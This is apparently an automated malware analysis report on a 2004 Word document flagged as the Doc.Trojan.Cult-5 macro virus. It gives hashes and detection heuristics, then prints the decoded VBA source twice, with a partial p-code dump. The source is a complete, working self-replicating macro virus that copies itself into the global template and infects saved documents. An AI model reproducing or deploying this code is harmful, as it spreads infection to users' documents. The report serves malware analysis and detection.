Office (OLE) malware analysis — malicious · b28f7336e4a5db7c

MALICIOUS

Office (OLE)

36.5 KB Created: 2004-05-17 07:18:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 7031f33786a9d1c7de72e6f3a4badb6a SHA-1: b1fdb8c50f93f68fc9e431a0c4acb7a11f5ccc61 SHA-256: b28f7336e4a5db7c6f2eec55536c0a9625d5dd659a2fe4f637ca8a49ea95be17

160 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic

The sample is identified as a malicious document by ClamAV, specifically 'Doc.Trojan.Cult-5'. It contains legacy WordBasic macro markers and an Auto_Close macro, indicating it is designed to execute malicious code upon opening or closing. The VBA script, though truncated, appears to be part of a propagation mechanism, consistent with worm-like behavior.

Heuristics 4

ClamAV: Doc.Trojan.Cult-5 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Cult-5
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS

OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Auto_Close macro high OLE_VBA_AUTOCLOSE

Auto_Close macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12956 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	12956 bytes
SHA-256: `04d4a2d586cc61cd1bc1769309d9c573168b9706bb58e2a07de8bda9253bcd81`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "AuToClOsE" Private Function Name1$(h$) Dim a$ Dim x Dim i Dim l Dim d$ Dim e$ Dim z Dim AA$ Dim y Dim k$ Dim CC$ a$ = WordBasic.[MenuText$](0, 1, 0) x = Len(a$) + 1: i = 1: l = 1 Again: If i = x Then GoTo GOON d$ = Mid(a$, i, 1) If d$ = Chr(38) Or d$ = Chr(46) Or d$ = Chr(32) Then i = i + 1 GoTo Again Else e$ = e$ + d$ i = i + 1 GoTo Again End If GOON: z = Len(e$) + 1 AA$ = WordBasic.[MenuItemText$](e$, 0, 1, 0) y = Len(AA$) + 1 Again2: If l = y Then GoTo Finish k$ = Mid(AA$, l, 1) If k$ = "&" Or k$ = Chr(46) Or k$ = Chr(32) Or k$ = "-" Or k$ = "/" Then l = l + 1 GoTo Again2 Else CC$ = CC$ + k$ l = l + 1 GoTo Again2 End If Finish: h$ = WordBasic.[Left$](CC$, z) Name1$ = e$ + h$ End Function Private Function Name2$(h$) Dim a$ Dim x Dim i Dim l Dim d$ Dim e$ Dim z Dim AA$ Dim y Dim k$ Dim CC$ a$ = WordBasic.[MenuText$](0, 1, 0) x = Len(a$) + 1: i = 1: l = 1 Again: If i = x Then GoTo GOON d$ = Mid(a$, i, 1) If d$ = Chr(38) Or d$ = Chr(46) Or d$ = Chr(32) Then i = i + 1 GoTo Again Else e$ = e$ + d$ i = i + 1 GoTo Again End If GOON: z = Len(e$) + 1 AA$ = WordBasic.[MenuItemText$](e$, 0, 2, 0) y = Len(AA$) + 1 Again2: If l = y Then GoTo Finish k$ = Mid(AA$, l, 1) If k$ = "&" Or k$ = Chr(46) Or k$ = Chr(32) Or k$ = "-" Or k$ = "/" Then l = l + 1 GoTo Again2 Else CC$ = CC$ + k$ l = l + 1 GoTo Again2 End If Finish: h$ = WordBasic.[Left$](CC$, z) Name2$ = e$ + h$ End Function Public Sub MAIN() Dim o Dim k Dim m$ Dim h$ Dim n$ If WordBasic.CountMacros(0) > 0 Then For o = 1 To WordBasic.CountMacros(0) If WordBasic.[MacroName$](o, 0) = "cULT" Then k = 1 End If Next o If k = 1 Then GoTo Finish Else WordBasic.MacroCopy WordBasic.[WindowName$]() + ":AuToClOsE", "Global:cULT" WordBasic.ScreenUpdating m$ = Name1$(h$): n$ = Name2$(h$) WordBasic.ToolsMacro Name:=m$, Show:=1, Edit:=1 InsertCode WordBasic.ToolsMacro Name:=n$, Show:=1, Edit:=1 InsertCode WordBasic.FileSaveAll 1, 1 WordBasic.ScreenUpdating End If Finish: Rem CULT! Nightmare Joker (SLAM) End If End Sub Private Sub InsertCode() WordBasic.StartOfDocument WordBasic.LineDown 1 WordBasic.CharRight 10 WordBasic.Insert Chr(32) WordBasic.StartOfDocument WordBasic.LineDown 4 WordBasic.EndOfLine WordBasic.InsertPara WordBasic.Insert "cULT.DoIt" WordBasic.DocClose 1 End Sub Private Sub DoIt() Dim o Dim Infect On Error GoTo -1: On Error GoTo Finish If WordBasic.CountMacros(1) > 0 Then For o = 1 To WordBasic.CountMacros(1) If WordBasic.[MacroName$](o, 1) = "AuToClOsE" Then Infect = 1 End If Next o End If If Infect = 0 Then WordBasic.FileSaveAs Format:=1 WordBasic.MacroCopy "Global:cULT", WordBasic.[WindowName$]() + ":AuToClOsE" WordBasic.FileSaveAll 1, 1 End If End Sub ' Processing file: /opt/analyzer/scan_staging/c3f6d07cccc84c359ce88c9a72a2e221.bin ' =============================================================================== ' Module streams: ' Macros/VBA/ThisDocument - 979 bytes ' Line #0: ' Macros/VBA/AuToClOsE - 7824 bytes ' Line #0: ' Line #1: ' FuncDefn (Private Function Name1(h)) ' Line #2: ' Dim ' VarDefn a ' Line #3: ' Dim ' VarDefn x ' Line #4: ' Dim ' VarDefn i ' Line #5: ' Dim ' VarDefn l ' Line #6: ' Dim ' VarDefn d ' Line #7: ' Dim ' VarDefn e ' Line #8: ' Dim ' VarDefn z ' Line #9: ' Dim ' VarDefn AA ' Line #10: ' Dim ' VarDefn y ' Line #11: ' Dim ' VarDefn k ' Line #12: ' Dim ' VarDefn CC ' Line #13: ' LitDI2 0x0000 ' LitDI2 0x0001 ' LitDI2 0x0000 ' Ld WordBasic ' ArgsMemLd [MenuText$] 0x0003 ' St a$ ' Line #14: ' Ld a$ ' FnLen ' LitDI ... (truncated)

SHA-256: 04d4a2d586cc61cd1bc1769309d9c573168b9706bb58e2a07de8bda9253bcd81

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True


Attribute VB_Name = "AuToClOsE"

Private Function Name1$(h$)
Dim a$
Dim x
Dim i
Dim l
Dim d$
Dim e$
Dim z
Dim AA$
Dim y
Dim k$
Dim CC$
a$ = WordBasic.[MenuText$](0, 1, 0)
x = Len(a$) + 1: i = 1: l = 1
Again:
If i = x Then GoTo GOON
d$ = Mid(a$, i, 1)
If d$ = Chr(38) Or d$ = Chr(46) Or d$ = Chr(32) Then
    i = i + 1
    GoTo Again
Else
    e$ = e$ + d$
    i = i + 1
    GoTo Again
End If
GOON:
z = Len(e$) + 1
AA$ = WordBasic.[MenuItemText$](e$, 0, 1, 0)
y = Len(AA$) + 1
Again2:
If l = y Then GoTo Finish
k$ = Mid(AA$, l, 1)
If k$ = "&" Or k$ = Chr(46) Or k$ = Chr(32) Or k$ = "-" Or k$ = "/" Then
    l = l + 1
    GoTo Again2
Else
    CC$ = CC$ + k$
    l = l + 1
    GoTo Again2
End If
Finish:
h$ = WordBasic.[Left$](CC$, z)
Name1$ = e$ + h$
End Function

Private Function Name2$(h$)
Dim a$
Dim x
Dim i
Dim l
Dim d$
Dim e$
Dim z
Dim AA$
Dim y
Dim k$
Dim CC$
a$ = WordBasic.[MenuText$](0, 1, 0)
x = Len(a$) + 1: i = 1: l = 1
Again:
If i = x Then GoTo GOON
d$ = Mid(a$, i, 1)
If d$ = Chr(38) Or d$ = Chr(46) Or d$ = Chr(32) Then
    i = i + 1
    GoTo Again
Else
    e$ = e$ + d$
    i = i + 1
    GoTo Again
End If
GOON:
z = Len(e$) + 1
AA$ = WordBasic.[MenuItemText$](e$, 0, 2, 0)
y = Len(AA$) + 1
Again2:
If l = y Then GoTo Finish
k$ = Mid(AA$, l, 1)
If k$ = "&" Or k$ = Chr(46) Or k$ = Chr(32) Or k$ = "-" Or k$ = "/" Then
    l = l + 1
    GoTo Again2
Else
    CC$ = CC$ + k$
    l = l + 1
    GoTo Again2
End If
Finish:
h$ = WordBasic.[Left$](CC$, z)
Name2$ = e$ + h$
End Function

Public Sub MAIN()
Dim o
Dim k
Dim m$
Dim h$
Dim n$
If WordBasic.CountMacros(0) > 0 Then
For o = 1 To WordBasic.CountMacros(0)
If WordBasic.[MacroName$](o, 0) = "cULT" Then
    k = 1
End If
Next o
If k = 1 Then
    GoTo Finish
Else
    WordBasic.MacroCopy WordBasic.[WindowName$]() + ":AuToClOsE", "Global:cULT"
    WordBasic.ScreenUpdating
    m$ = Name1$(h$): n$ = Name2$(h$)
    WordBasic.ToolsMacro Name:=m$, Show:=1, Edit:=1
    InsertCode
    WordBasic.ToolsMacro Name:=n$, Show:=1, Edit:=1
    InsertCode
    WordBasic.FileSaveAll 1, 1
    WordBasic.ScreenUpdating
End If
Finish:

Rem CULT! Nightmare Joker (SLAM)

End If
End Sub

Private Sub InsertCode()
WordBasic.StartOfDocument
WordBasic.LineDown 1
WordBasic.CharRight 10
WordBasic.Insert Chr(32)
WordBasic.StartOfDocument
WordBasic.LineDown 4
WordBasic.EndOfLine
WordBasic.InsertPara
WordBasic.Insert "cULT.DoIt"
WordBasic.DocClose 1
End Sub

Private Sub DoIt()
Dim o
Dim Infect
On Error GoTo -1: On Error GoTo Finish
If WordBasic.CountMacros(1) > 0 Then
For o = 1 To WordBasic.CountMacros(1)
    If WordBasic.[MacroName$](o, 1) = "AuToClOsE" Then
            Infect = 1
    End If
Next o
End If
If Infect = 0 Then
WordBasic.FileSaveAs Format:=1
WordBasic.MacroCopy "Global:cULT", WordBasic.[WindowName$]() + ":AuToClOsE"
WordBasic.FileSaveAll 1, 1
End If
End Sub

' Processing file: /opt/analyzer/scan_staging/c3f6d07cccc84c359ce88c9a72a2e221.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 979 bytes
' Line #0:
' Macros/VBA/AuToClOsE - 7824 bytes
' Line #0:
' Line #1:
' 	FuncDefn (Private Function Name1(h))
' Line #2:
' 	Dim 
' 	VarDefn a
' Line #3:
' 	Dim 
' 	VarDefn x
' Line #4:
' 	Dim 
' 	VarDefn i
' Line #5:
' 	Dim 
' 	VarDefn l
' Line #6:
' 	Dim 
' 	VarDefn d
' Line #7:
' 	Dim 
' 	VarDefn e
' Line #8:
' 	Dim 
' 	VarDefn z
' Line #9:
' 	Dim 
' 	VarDefn AA
' Line #10:
' 	Dim 
' 	VarDefn y
' Line #11:
' 	Dim 
' 	VarDefn k
' Line #12:
' 	Dim 
' 	VarDefn CC
' Line #13:
' 	LitDI2 0x0000 
' 	LitDI2 0x0001 
' 	LitDI2 0x0000 
' 	Ld WordBasic 
' 	ArgsMemLd [MenuText$] 0x0003 
' 	St a$ 
' Line #14:
' 	Ld a$ 
' 	FnLen 
' 	LitDI
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.